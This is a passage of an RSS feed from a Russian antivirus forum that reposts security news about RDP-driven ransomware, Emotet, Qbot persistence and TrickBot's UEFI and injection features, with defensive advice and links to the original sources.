			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic16329/message111913/">RDP, Ransomware - проблемы, которые никуда не денутся</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			2020 год запомнится как один из самых сложных и трагических лет, с которыми человечество столкнулось в наше время. Глобальная пандемия изменила то, как мы живем и работаем, невероятным образом, возможно, навсегда.<br /><br />Это также резко изменило ландшафт кибербезопасности. ФБР сообщило о 300-процентном росте киберпреступности в первом квартале того же года, а количество и стоимость атак с использованием программ-вымогателей выросли с беспрецедентной скоростью. Только в декабре 2020 года было зарегистрировано почти тридцать атак, включая печально известное требование на 34 миллиона долларов, которое было предъявлено электронному гиганту Foxconn.<br /><br /><B>Одна из основных причин быстрого роста числа этих атак - переход от безопасных офисных помещений к менее безопасным удаленным рабочим средам.</B> До глобальной пандемии менее 4 процентов населения работали из дома. Однако джинн вышел из бутылки, и пути назад нет. Поэтому неудивительно, что недавний опрос Gallup показал, что 82 процента руководителей предприятий планируют более активно работать на дому (WFH) и после пандемии.<br /><br />В то время как многие организации могут извлечь выгоду из более широкого выбора кандидатов на работу и снижения затрат на обслуживание и оборудование, для специалистов по безопасности среда работы на дому расширяет поверхность атаки, которую они должны защищать, и увеличивает риски фишинга, вредоносных программ и программ-вымогателей.<br /><br /><B>Целью сегодняшних организованных и изощренных киберпреступников, таких как те, что управляют Maze или Ryuk, является не отдельный компьютер, а вся сеть организации.</B> Большинство всех атак программ-вымогателей получают доступ к сети жертвы с помощью «черного хода», который использует слабые места в программном обеспечении протокола удаленного рабочего стола (RDP) или способах его развертывания.<br /><br />Об угрозе брутфорса RDP <noindex><a href="https://blog.malwarebytes.com/exploits-and-vulnerabilities/2020/10/brute-force-attacks-increasing/" target="_blank" rel="nofollow"><B>было много сообщений,</B></a></noindex> и защита RDP была обязательной в течение нескольких лет, и тем не менее эти атаки продолжают приносить успех. Правда в том, что просто посоветовать людям усилить RDP недостаточно быстро. Защита от грубой силы должна быть больше, чем просто еще один пункт в постоянно растущем списке задач перегруженного работой системного администратора. Вместо этого нам нужно увидеть грубое форсирование RDP для того, что это такое, проблема обнаружения и ответа конечной точки (EDR), и обработать ее там.<br /><br />Менее широко освещаются уязвимости, которые продолжают обнаруживаться в популярном программном обеспечении RDP. В 2020 году исследователи безопасности обнаружили двадцать пять уязвимостей в некоторых из самых популярных клиентов RDP, используемых предприятиями. К ним относятся:<br /><br /><br />====quote====<br />FreeRDP, самый популярный клиент RDP с открытым исходным кодом на Github.<br />Встроенный клиент RDP от Microsoft с исполняемым файлом mstsc.exe<br />Rdesktop, еще один клиент RDP с открытым исходным кодом и клиент RDP по умолчанию в дистрибутивах Kali Linux<br />=============<br /><br />Многие специалисты по безопасности могут не знать об обратных уязвимостях RDP, которые могут повлиять на удаленную машину, а не на хост, к которому подключен пользователь. Кропотливая работа по инвентаризации и исправлению ошибок остается как никогда важной.<br /><br /><noindex><a href="https://blog.malwarebytes.com/malwarebytes-news/2021/02/rdp-the-ransomware-problem-that-wont-go-away/" target="_blank" rel="nofollow">https://blog.malwarebytes.com/malwarebytes-news/2021/02/rdp-the-ransomware-problem-that-wont-go-away/</a></noindex> <br />
			<i>18.02.2021 08:16:45, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic16329/message111913/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic16329/message111913/</guid>
			<pubDate>Thu, 18 Feb 2021 08:16:45 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>невозможность установить антивирус</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic16298/message111676/">невозможность установить антивирус</a></b> <i>При загрузки антивируса возникает ошибка MSI.1303</i> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			<noindex><a href="https://www.sendspace.com/file/6dtd2o" target="_blank" rel="nofollow">https://www.sendspace.com/file/6dtd2o</a></noindex> <br />
			<i>26.01.2021 17:44:11, Александр Дмитриев.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic16298/message111676/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic16298/message111676/</guid>
			<pubDate>Tue, 26 Jan 2021 17:44:11 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>Что такое Emotet?</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic16277/message111556/">Что такое Emotet?</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			Банковский троян <B>Emotet</B> был впервые обнаружен исследователями безопасности в 2014 году. Первоначально Emotet создавался как банковское вредоносное ПО, которое пыталось проникнуть на ваш компьютер и украсть конфиденциальную и личную информацию. В более поздних версиях программного обеспечения были добавлены службы рассылки спама и вредоносных программ, в том числе других банковских троянцев. Emotet использует функции, которые помогают избежать обнаружения программного обеспечения некоторыми продуктами для защиты от вредоносных программ. Emotet использует возможности червя для распространения на другие подключенные компьютеры. Это помогает в распространении вредоносного ПО. Эта функция позволила прийти к выводу, что Emotet является одним из наиболее дорогостоящих и разрушительных вредоносных программ, поражающих государственный и частный секторы, отдельных лиц и организации, а устранение которых обходится в 1 миллион долларов за инцидент.<br /><br /><B>Что такое Emotet? </B>Emotet - это троянец, который в основном распространяется через спам-сообщения (malspam). <B>Заражение может происходить либо через вредоносный сценарий, файлы документов с поддержкой макросов, либо через вредоносную ссылку.</B> Электронные письма Emotet могут содержать знакомый брендинг, который выглядит как подлинное электронное письмо. Emotet может попытаться убедить пользователей щелкнуть вредоносные файлы, используя соблазнительные выражения о «вашем счете», «платежных реквизитах» или, возможно, о предстоящей доставке от известных компаний по доставке. Emotet прошел несколько итераций. Ранние версии поступали в виде вредоносного файла JavaScript. В более поздних версиях использовались документы с поддержкой макросов для извлечения полезной нагрузки вируса с серверов управления и контроля (C&C), запускаемых злоумышленниками. Emotet использует ряд уловок, чтобы предотвратить обнаружение и анализ. Примечательно, что Emotet знает, работает ли он внутри виртуальной машины (ВМ), и будет бездействовать, если обнаружит среду песочницы, которая является инструментом, который исследователи кибербезопасности используют для наблюдения за вредоносными программами в безопасном контролируемом пространстве. Emotet также использует C&C серверы для получения обновлений. Это работает так же, как и обновления операционной системы на вашем ПК, и может происходить плавно и без каких-либо внешних признаков. Это позволяет злоумышленникам устанавливать обновленные версии программного обеспечения, устанавливать дополнительные вредоносные программы, такие как другие банковские трояны, или действовать в качестве свалки для украденной информации, такой как финансовые учетные данные, имена пользователей и пароли, а также адреса электронной почты.<br /><br /><B>Как распространяется Emotet? </B>Основной метод распространения Emotet - вредоносный спам. Emotet просматривает ваш список контактов и отправляет его вашим друзьям, семье, коллегам и клиентам. Поскольку эти электронные письма поступают из вашей взломанной учетной записи электронной почты, электронные письма меньше похожи на спам, а получатели, чувствуя себя в безопасности, более склонны переходить по неправильным URL-адресам и загружать зараженные файлы. Если подключенная сеть присутствует, Emotet распространяется с использованием списка общих паролей, угадывая путь к другим подключенным системам в результате атаки грубой силы. Если пароль для важнейшего сервера отдела кадров - это просто «password», то, скорее всего, Emotet найдет там свой путь. Первоначально исследователи думали, что Emotet также распространяется с использованием уязвимостей EternalBlue / DoublePulsar, которые были ответственны за атаки WannaCry и NotPetya. Теперь мы знаем, что это не так. К такому выводу исследователей привел тот факт, что TrickBot, троянец, часто распространяемый Emotet, использует эксплойт EternalBlue для распространения по заданной сети. Это был TrickBot, а не Emotet, который воспользовался уязвимостями EternalBlue / DoublePulsar.<br /><br /><B>Какова история Emotet?</B> Впервые обнаруженный в 2014 году, Emotet продолжает заражать системы и причинять вред пользователям по сей день, поэтому мы до сих пор говорим об этом, в отличие от других тенденций 2014 года . Первая версия Emotet была разработана для кражи данных банковских счетов путем перехвата интернет-трафика. Вскоре после этого была обнаружена новая версия программного обеспечения. Эта версия, получившая название Emotet version 2, поставлялась с несколькими модулями, включая систему денежных переводов, модуль против спама и банковский модуль, предназначенный для немецких и австрийских банков. К январю 2015 года на сцене появилась новая версия Emotet. Третья версия содержала скрытые модификации, предназначенные для того, чтобы вредоносная программа оставалась незамеченной, и добавляла новые цели для швейцарских банков. Перенесемся в 2018 год - новые версии троянца Emotet включают возможность установки других вредоносных программ на зараженные машины. Это вредоносное ПО может включать в себя другие трояны и программы-вымогатели. По данным Gizmodo, в июле 2019 года атака Emotet в Лейк-Сити, штат Флорида, обошлась городу в 460000 долларов в виде выплаты вымогателей. Анализ атаки показал, что Emotet служил только первоначальным вектором заражения. После заражения Emotet загрузил еще один банковский троян, известный как TrickBot и программу-вымогатель Ryuk. После относительно тихой работы на протяжении большей части 2019 года Emotet снова стал сильным. В сентябре 2019 года Malwarebytes Labs сообщила о спам-кампании, организованной ботнетами, нацеленной на жертв из Германии, Польши, Италии и Англии, с искусно сформулированными темами, такими как «Уведомление о переводе платежей» и «Просроченный счет». Открытие зараженного документа Microsoft Word запускает макрос, который, в свою очередь, загружает Emotet со взломанных сайтов WordPress.<br /><br />«Текущие версии троянца Emotet включают возможность установки других вредоносных программ на зараженные машины. Это вредоносное ПО может включать в себя другие банковские трояны или службы доставки вредоносного спама »<br /><br /><B>На кого нацелен Emotet?</B> Каждый является целью Emotet. На сегодняшний день Emotet атакует частных лиц, компании и государственные учреждения в Соединенных Штатах и Европе, похищая банковские логины, финансовые данные и даже биткойн-кошельки. Одна заслуживающая внимания атака Emotet на город Аллентаун, штат Пенсильвания, потребовала прямой помощи от группы реагирования на инциденты Microsoft для очистки и, как сообщается, стоила городу более 1 миллиона долларов для устранения. Теперь, когда Emotet используется для загрузки и доставки других банковских троянцев, список целей потенциально еще шире. Ранние версии Emotet использовались для атак на клиентов банков в Германии. Более поздние версии Emotet были нацелены на организации в Канаде, Великобритании и США.<br /><br /> <B> &nbsp; Как я могу защитить себя от Emotet?</B> Вы уже делаете первый шаг к защите себя и своих пользователей от Emotet, узнав, как работает Emotet. Вот несколько шагов, которые вы можете предпринять: Держите компьютер / конечные точки в актуальном состоянии с помощью последних исправлений для Microsoft Windows. TrickBot часто поставляется в качестве полезной нагрузки Emotet, и мы знаем, что TrickBot полагается на уязвимость Windows EternalBlue для выполнения своей работы, поэтому исправляйте эту уязвимость, прежде чем киберпреступники смогут ею воспользоваться. Не загружайте подозрительные вложения и не переходите по сомнительным ссылкам. Emotet не сможет закрепиться в вашей системе или сети, если вы будете избегать этих подозрительных писем. Найдите время, чтобы обучить своих пользователей тому, как определять вредоносный спам. Обучите себя и своих пользователей созданию надежного пароля. Вы можете защитить себя и своих пользователей от Emotet с помощью надежной программы кибербезопасности, которая включает многоуровневую защиту.<br /><br /><br /><noindex><a href="https://www.malwarebytes.com/emotet/" target="_blank" rel="nofollow">https://www.malwarebytes.com/emotet/</a></noindex><br /><br />--------------<br />пример работы Emotet<br /><br /><noindex><a href="https://app.any.run/tasks/b8e10aa1-e3d9-4f6f-86fc-e428c9359537" target="_blank" rel="nofollow">https://app.any.run/tasks/b8e10aa1-e3d9-4f6f-86fc-e428c9359537</a></noindex><br /><br />Анализ Emotet: <br /><noindex><a href="https://blog.malwarebytes.com/threat-analysis/2018/05/malware-analysis-decoding-emotet-part-1/" target="_blank" rel="nofollow">Malware analysis: decoding Emotet, part 1</a></noindex><br /><br /><noindex><a href="https://blog.malwarebytes.com/threat-analysis/2018/06/malware-analysis-decoding-emotet-part-2/" target="_blank" rel="nofollow">Malware analysis: decoding Emotet, part 2</a></noindex> <br />
			<i>06.01.2021 16:36:39, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic16277/message111556/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic16277/message111556/</guid>
			<pubDate>Wed, 06 Jan 2021 16:36:39 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>Когда заканчивается детектирование угрозы, начинается хантинг</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic16272/message111533/">Когда заканчивается детектирование угрозы, начинается хантинг</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			11:18 / 28 Декабря, 2020<br /><br />Динамика развития киберпреступности сигнализирует рынку о том, что основную массу угроз компании должны уметь отражать автоматически, но этого мало.<br /><br />Все сетевые атаки можно классифицировать по цели, которую преследует злоумышленник. Изначально компьютерные «нападения» совершались с целью «повандалить» - например, разрабатывались вирусы, удаляющие важную информацию. С развитием информатизации преступники стали руководствоваться другими мотивами – извлечение финансовой выгоды, реализация конкурентной борьбы, решение разведывательных задач. Все чаще стали совершаться целевые атаки, направленные на взлом определенных сетей и компьютеров. В отличие от массовых нападений («взламывается все, что можно»), злоумышленник ищет возможность проникнуть в инфраструктуру вне зависимости от степени ее защищенности. Целевая атака может быть направлена на определенную организацию, отрасль экономики, государственные структуры. Со временем такие «нападения» становятся все более изощренными. Так, например, в 2020 году японский автоконцерн Honda подвергся атаке шифровальщика Snake, в результате чего компания была вынуждена приостановить производство на ряде предприятий<br /><br />Для защиты от целевых атак не существует универсального рецепта, необходима «умная» защита на всех уровнях. Group-IB недавно представила продукт Threat Hunting Framework (THF), включающий в себя несколько модулей, каждый из которых несет ряд инноваций и по своей функциональности выходит за рамки существующих продуктовых категорий, по сути, определяя принципиально новые типы инструментов защиты от кибератак. Прежде всего, в продукте интересен сам подход – впервые он устанавливает единые стандарты защиты для таких разных окружений, как ИТ-инфраструктура, рабочие места (в том числе и удаленные), а так же технологические сети (ОТ), изолированные от сети Интернет. В итоге Threat Hunting Framework – сложный комплексный продукт, предназначенный для выявления целевых атак и неизвестных типов вредоносного ПО, предоставляющий автоматизированные инструменты для блокировки обнаруженных угроз, а также для расследования инцидентов информационной безопасности и реагирования на них как внутри, так и за пределами защищенного периметра организации.<br /><br />THF помогает команде ИБ связывать разрозненные события вне и внутри сети, управлять данными для хантинга и прогнозировать новые атаки<br /><br /><br /> &nbsp;Подробнее: <noindex><a href="https://www.securitylab.ru/analytics/515120.php" target="_blank" rel="nofollow">https://www.securitylab.ru/analytics/515120.php</a></noindex> <br />
			<i>03.01.2021 14:45:35, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic16272/message111533/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic16272/message111533/</guid>
			<pubDate>Sun, 03 Jan 2021 14:45:35 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>Вредоносная программа Qbot перешла на новый скрытый метод автозапуска Windows</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic16242/message111248/">Вредоносная программа Qbot перешла на новый скрытый метод автозапуска Windows</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			<img src="https://www.bleepstatic.com/content/hl-images/2020/12/09/Qbot.jpg" alt="Пользователь добавил изображение" border="0" /><br /><br /><B>Новая версия вредоносного ПО Qbot теперь активирует свой механизм сохранения непосредственно перед выключением зараженных устройств Windows и автоматически удаляет все следы при перезагрузке системы или выходе из спящего режима.</B><br /><br />Qbot (также известный как Qakbot, Quakbot и Pinkslipbot) - это банковский троян для Windows с функциями червя, активными по крайней мере с 2009 года и используемыми для кражи банковских учетных данных, личной информации и финансовых данных.<br /><br />Вредоносная программа также использовалась для регистрации нажатий клавиш пользователем, для установки бэкдоров на взломанных компьютерах и для развертывания маяков Cobalt Strike, используемых операторами программ-вымогателей для доставки полезных нагрузок программ-вымогателей ProLock и Egregor.<br /><br />В недавних кампаниях жертвы Qbot были заражены с помощью фишинговых писем с вложениями документов Excel, выдаваемых за документы DocuSign.<br /><br />Начиная с 24 ноября, когда исследователь угроз Binary Defense Джеймс Куинн сообщил, что была обнаружена новая версия Qbot, вредоносная программа использует более новый и скрытый механизм сохранения, который использует сообщения о завершении работы системы и возобновлении работы для переключения сохраняемости на зараженных устройствах.<br /><br />«В то время как в первоначальных отчетах других исследователей говорилось, что в новой версии Qakbot был удален механизм сохранения ключа Run, он вместо этого был добавлен к более скрытому и интересному механизму сохранения, который прослушивает сообщения о завершении работы системы, а также PowerBroadcast Suspend / Resume сообщения ", - объясняет Куинн.<br /><br />Троян добавит в реестр раздел Run в зараженных системах, который позволяет ему автоматически запускаться при входе в систему, и будет пытаться немедленно удалить его, как только пользователь включит питание или выйдет из спящего режима компьютер, чтобы избежать обнаружения антивирусными решениями или средствами безопасности.<br /><br />Что делает эту технику незаметной, так это идеальное время, используемое разработчиками Qbot для внедрения ключа в реестр Windows.<br /><br />Вредоносная программа только добавит ключ запуска перед тем, как система перейдет в спящий режим или выключится, но сделает это настолько близко к тому, что «продукты безопасности не смогут обнаружить новый ключ запуска и сообщить о нем».<br /><br />Затем Qbot попытается удалить ключ сохранения несколько раз после того, как он снова запустится при пробуждении системы или входе в систему.<br /><br />Хотя этот метод обеспечения устойчивости является новым для Qbot, другие вредоносные программы использовали аналогичные методы для уклонения от обнаружения в прошлом, в том числе банковские трояны Gozi и Dridex.<br /><br />"Похоже, что два семейства вредоносных программ имеют схожий механизм в том смысле, что оба они прослушивают сообщения WM_QUERYENDSESSION и WM_ENDSESSION, чтобы определить, когда пользователь выходит из системы, но новая версия Qakbot идет дальше, также ища события питания, такие как WM_POWERBROADCAST и PBT_APMSUSPEND для установки своих перехватчиков, когда система также приостановлена »<br /><br />Изменения в установке и конфигурации<br /><br />Методика установки Qbot также была обновлена &#8203;&#8203;в этой новой версии, поскольку она использует новую архитектуру DLL, которая объединяет загрузчик вредоносных программ и бота в одной DLL.<br /><br />Ранее загрузчик избегал обнаружения автоматизированными системами «песочницы» вредоносных программ, сохраняя весь вредоносный код в отдельном компоненте DllRegisterServer и вызывая его только через regsvr32.exe или rundll32.exe при использовании определенных аргументов командной строки.<br /><br />Новая версия упрощает эту технику, удаляя аргументы командной строки из процесса и переключая внедрение кода бота во вновь созданные процессы.<br /><br />«Удаление переключателей командной строки и проверок анализа посредством создания нового процесса (при сохранении многих проверок антианализа и песочницы), механизм установки нового загрузчика происходит только после того, как бот был внедрен в explorer.exe»<br /><br /><noindex><a href="https://www.bleepingcomputer.com/news/security/qbot-malware-switched-to-stealthy-new-windows-autostart-method/" target="_blank" rel="nofollow">https://www.bleepingcomputer.com/news/security/qbot-malware-switched-to-stealthy-new-windows-autostart-method/</a></noindex> <br />
			<i>11.12.2020 09:04:36, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic16242/message111248/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic16242/message111248/</guid>
			<pubDate>Fri, 11 Dec 2020 09:04:36 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>Новый модуль TrickBot предназначен для заражения вашей прошивки UEFI</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic16234/message111146/">Новый модуль TrickBot предназначен для заражения вашей прошивки UEFI</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			<img src="https://www.bleepstatic.com/content/hl-images/2020/12/02/TrickBoot1.jpg" alt="Пользователь добавил изображение" border="0" /><br /><br /><B>Разработчики вредоносного ПО TrickBot создали новый модуль, который исследует уязвимости UEFI, демонстрируя усилия злоумышленника на уровне, который дал бы им полный контроль над зараженными машинами.<br /></B><br />Имея доступ к прошивке UEFI, злоумышленник установит на скомпрометированной машине контроль, который сохраняется после переустановки операционной системы или замены накопителей.<br /><br />Вредоносный код, внедренный в прошивку (буткиты), невидим для решений безопасности, работающих поверх операционной системы, потому что он загружается раньше всего, на начальном этапе загрузки компьютера.<br /><br />Буткиты позволяют контролировать процесс загрузки операционной системы и саботировать защиту на более высоком уровне. Поскольку код запускается на самой ранней стадии, механизм безопасной загрузки не помогает, так как он зависит от целостности прошивки.<br /><br />Последствия, связанные с получением злоумышленником такого постоянного присутствия на машине, огромны, особенно в случае TrickBot, чье среднее ежедневное заражение может достигать нескольких тысяч.<br /><br /><B>Ориентация на платформы Intel</B><br /><br />Сегодня в совместном отчете отдела кибербезопасности Advanced Intelligence (AdvIntel) и исследователей из фирмы Eclypsium, занимающейся аппаратным обеспечением и безопасностью, представлены технические подробности о новом компоненте TrickBot.<br /><br />На этом этапе TrickBoot действует как средство разведки, проверяя наличие уязвимостей в прошивке UEFI зараженной машины. На данный момент проверка нацелена только на платформы Intel (Skylake, Kaby Lake, Coffee Lake, Comet Lake). Тем не менее, модуль также включает в себя код для чтения, записи и стирания прошивки, поэтому его можно использовать для значительных повреждений.<br /><br />Он проверяет, активна ли защита от записи UEFI / BIOS, с помощью драйвера RwDrv.sys от RWEverything, бесплатной утилиты, которая обеспечивает доступ к аппаратным компонентам, таким как микросхема флэш-памяти SPI, на которой хранится прошивка BIOS / UEFI системы.<br /><br />Данный инструмент использовался в LoJax, первом рутките UEFI, обнаруженным в дикой природе, в результате атаки российских хакеров, известных как APT28 (Fancy Bear, Sednit, Strontium, Sofacy).<br /><br /> &nbsp; &nbsp;«Все запросы к прошивке UEFI, хранящейся во флэш-чипе SPI, проходят через контроллер SPI, который является частью концентратора контроллеров платформы (PCH) на платформах Intel. Этот контроллер SPI включает механизмы контроля доступа, которые можно заблокировать во время процесса загрузки, чтобы предотвратить несанкционированное изменение прошивки UEFI, хранящейся в микросхеме флэш-памяти SPI »<br /><br />- совместный отчет (Eclypsium, AdvIntel)<br /><br />Исследователи говорят, что защита от записи BIOS / UEFI доступна в современных системах, но эта функция часто не активна или настроена неправильно, что позволяет злоумышленникам изменить прошивку или удалить ее, чтобы заблокировать устройство.<br /><br />Исследователи обнаружили модуль 19 октября и назвали его TrickBoot, за его функциональность и название вредоносного ботнета, которое его развертывает.<br /><br />В образце, проанализированном Advanced Intelligence, исследователи обнаружили имя «PermaDll», связанное с файлом «user_platform_check.Dll» в новом образце TrickBot.<br /><br />Изучение файла с помощью Eclypsium показало, что злоумышленник реализовал механизм, который проверял однокристальный чипсет в скомпрометированной системе.<br /><br />Исследователи обнаружили, что роль модуля заключалась в выполнении запросов PCH для определения конкретной модели PCH, запущенной в системе, таким образом идентифицируя платформу. Эта информация также позволяет злоумышленнику проверить, уязвима платформа или нет.<br /><br />Исследователи также обнаружили, что актер использует функции известного инструмента эксплуатации встроенного ПО и библиотеки под названием fwexpl для следующих целей:<br /><br />читать данные с аппаратных портов ввода-вывода<br />вызвать драйвер rwdrv.sys для записи данных в аппаратные порты ввода-вывода<br />вызвать драйвер rwdrv.sys для чтения данных из адресов физической памяти<br />вызвать драйвер rwdrv.sys для записи данных по адресам физической памяти<br /><br />Исследователи отмечают, что если TrickBoot работает на платформе, отсутствующей в его таблице поиска, он активирует функцию с предварительно установленным Skylake набором значений по умолчанию для операций, требующих доступа к оборудованию.<br /><br />После идентификации платформы TrickBoot обращается к путям, связанным с чтением регистров для флэш-памяти (SPIBAR, PRO-PR4) и управлением BIOS (BC - содержит биты блокировки защиты от записи для доступа к BIOS на аппаратном уровне).<br /><br />Интересной находкой в функции, которая пытается отключить защиту от записи BIOS, является то, что она содержит ошибку, которая считывается с неправильного смещения в регистре управления BIOS, чтобы проверить, установлен ли бит отключения защиты от записи BIOS. Это приводит к тому, что код интерпретирует, что защита от записи активна, и пытается ее отключить.<br /><br /><B>Основные последствия</B><br /><br /><B>TrickBot, разрабатывающий такой модуль, ясно указывает на то, что злоумышленник прилагает усилия для расширения своего контроля над скомпрометированными системами. В ботнете уже есть тысячи зараженных машин, на которых злоумышленник может выбирать наиболее ценные цели.<br /></B><br />Телеметрия AdvIntel показывает, что ежедневное число заражений TrickBot с 3 октября по 21 ноября достигло пика в 40 000, а в среднем - от 200 до 4 000. Эти цифры консервативны, так как не учитываются зараженные компьютеры в частных сетях, которые взаимодействуют извне, используя IP-адрес шлюза.<br /><br />Выбор наиболее прибыльных жертв осуществляется вручную на основе данных, полученных с помощью сценариев разведки, которые извлекают информацию из сетей, оборудования и программного обеспечения жертвы.<br /><br />Операторы финансово мотивированы и используют ботнет для доставки программ-вымогателей Ryuk и Conti на дорогостоящие машины. С 2018 года они заработали не менее 150 миллионов долларов. Только у одной недавней жертвы они взяли 2200 BTC (на тот момент они оценивались в 34 миллиона долларов).<br /><br />TrickBot - действительно киберпреступное предприятие, вовлеченное в несколько схем зарабатывания денег, включая банковское мошенничество и кражу финансовой / личной информации.<br /><br /><B>Защита</B><br /><br />Джесси Майкл, из Eclypsium, пишет, что определение того, была ли взломана система на уровне прошивки UEFI, является сложной задачей.<br /><br />Более тщательный метод состоит в том, чтобы прочитать содержимое микросхемы памяти SPI, когда система выключена, путем физического подключения устройства программирования флэш-памяти SPI. Однако это решение требует не только опыта, но и длительного простоя компании, поскольку в некоторых случаях микросхема припаяна к материнской плате, и это сопряжено с риском проблем с чтением.<br /><br />Другой метод - использовать инструменты с открытым исходным кодом (CHIPSEC) или платформу Eclypsium, которая ищет слабые места на уровне оборудования и прошивки, а также может определить, активна ли защита от записи BIOS.<br /><br />Проверка хэшей прошивки также помогает определить, не был ли изменен код. Кроме того, обновление прошивки - хороший способ убедиться, что она не подвержена известным уязвимостям.<br /><br />На основе анализа образца TrickBoot модуль только идентифицирует оборудование и проверяет, доступна ли запись в область BIOS. Но это можно легко изменить, чтобы разрешить запись во флэш-память SPI и изменить прошивку системы.<br /><br /><noindex><a href="https://www.bleepingcomputer.com/news/security/trickbots-new-module-aims-to-infect-your-uefi-firmware/" target="_blank" rel="nofollow">https://www.bleepingcomputer.com/news/security/trickbots-new-module-aims-to-infect-your-uefi-firmware/</a></noindex> <br />
			<i>05.12.2020 05:53:29, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic16234/message111146/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic16234/message111146/</guid>
			<pubDate>Sat, 05 Dec 2020 05:53:29 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>TrickBot v 100: выпущено обновление вредоносного ПО с новыми функциями</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic16211/message111050/">TrickBot v 100: выпущено обновление вредоносного ПО с новыми функциями</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			Киберпреступная группа TrickBot выпустила сотую версию вредоносного ПО TrickBot с дополнительными функциями, позволяющими избежать обнаружения.<br /><br /><img src="https://www.bleepstatic.com/content/hl-images/2017/09/03/TrickBot-Logo.png" alt="Пользователь добавил изображение" border="0" /><br /><br /><br /><B>TrickBot</B> - это вредоносное ПО, которое обычно устанавливается через вредоносные фишинговые сообщения электронной почты или другое вредоносное ПО. После установки TrickBot будет незаметно работать на компьютере жертвы, пока он загружает другие модули для выполнения различных задач.<br /><br />Эти модули выполняют широкий спектр злонамеренных действий, включая кражу базы данных служб Active Directory домена, распространение в сети, блокировку экрана, кражу файлов cookie и паролей браузера, а также кражу ключей OpenSSH.<br /><br />Известно, что TrickBot завершает атаку, предоставляя доступ к злоумышленникам, стоящим за вымогателями <B>Ryuk и Conti</B>, что еще больше усугубляет ситуацию.<br /><br />В TrickBot v100 добавлены новые функции<br /><br />После того, как в прошлом месяце Microsoft и их партнеры провели скоординированную атаку на инфраструктуру TrickBot, появилась надежда, что им потребуется время, чтобы восстановиться.<br /><br />К сожалению, TrickBot все еще не утихает, о чем свидетельствует выпуск сотой сборки вредоносного ПО TrickBot.<br /><br />Эта последняя сборка была обнаружена Виталием Кремезом из Advanced Intel, который обнаружил, что они добавили новые функции, которые затрудняют обнаружение.<br /><br />В этом выпуске TrickBot теперь внедряет свою DLL в легитимный исполняемый файл Windows wermgr.exe (Windows Problem Reporting) прямо из памяти с помощью кода из проекта MemoryModule.<br /><br />«MemoryModule - это библиотека, которую можно использовать для полной загрузки DLL из памяти - без предварительного сохранения на диск», - поясняет страница проекта на GitHub.<br /><br />Первоначально запущенный как исполняемый файл, TrickBot внедрится в wermgr.exe, а затем завершит работу исходного исполняемого файла TrickBot.<br /><br />По словам Кремеза, при внедрении DLL она будет делать это с помощью Doppel Hollowing или обработки двойного соединения, чтобы избежать обнаружения программным обеспечением безопасности.<br /><br />«Этот метод использует транзакции, функцию NTFS, которая позволяет сгруппировать набор действий в файловой системе, и если какое-либо из этих действий не удается, происходит полный откат. Процесс инжектора создает новую транзакцию, внутри которой он создает новый файл, содержащий вредоносную полезную нагрузку. Затем он сопоставляет файл внутри целевого процесса и, наконец, откатывает транзакцию. Таким образом, создается впечатление, что файл никогда не существовал, даже если его содержимое все еще находится в памяти процесса, "Описание этого метода, сделанное исследователем безопасности Франческо Мурони.<br /><br />Как видите, кибергруппа TrickBot не позволила нарушению своей инфраструктуры сдерживать их, и они продолжают интегрировать новые функции, чтобы предотвратить обнаружение вредоносного ПО.<br /><br /><B>К сожалению, это означает, что TrickBot останется с нами в обозримом будущем, а потребителям и предприятиям необходимо внимательно следить за тем, какие вложения электронной почты они открывают.</B><br /><br /><noindex><a href="https://www.bleepingcomputer.com/news/security/trickbot-turns-100-latest-malware-released-with-new-features/" target="_blank" rel="nofollow">https://www.bleepingcomputer.com/news/security/trickbot-turns-100-latest-malware-released-with-new-features/</a></noindex> <br />
			<i>24.11.2020 13:41:05, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic16211/message111050/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic16211/message111050/</guid>
			<pubDate>Tue, 24 Nov 2020 13:41:05 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>Где увидеть текущий проверяемый файл?</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic16048/message110412/">Где увидеть текущий проверяемый файл?</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
